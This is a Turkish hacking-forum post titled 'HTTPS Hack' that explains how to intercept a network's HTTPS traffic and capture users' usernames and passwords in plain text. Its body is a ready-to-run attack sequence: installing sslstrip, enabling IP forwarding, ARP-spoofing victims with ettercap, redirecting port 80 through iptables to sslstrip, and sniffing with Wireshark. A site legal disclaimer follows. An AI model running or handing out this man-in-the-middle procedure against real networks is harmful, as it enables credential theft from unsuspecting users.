HTTPS Hack

usta hacker46

Uzman üye
12 Tem 2013
1,583
0
26
K.maraş
[FONT=Verdana, Arial, Helvetica, sans-serif]Bu konuda; https protokolünden kriptolu olarak networkten sunuculara gönderilen trafiğin, arasına nasıl girileceği, https gelen trafiğin networkten sniff edilerek kullanıcı adı ve şifreler (videonun 3.25. dakikasında) ile tüm trafiğin kriptosuz olarak nasıl görülebileceği ve http den kurbana gönderilmesi anlatılmaktadır.




İlk olarak sslstrip’i kuruyoruz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install

Saldırı öncesi ayarları yapıyoruz
/proc/sys/net/ipv4/ip_forward
/etc/etter.conf

Saldırıya geçelim
ettercap -Tql eth1 -M arp:remote // //
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
wireshark
sslstrip -a -k -f

[Vimeo=74235223]
[/FONT]
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.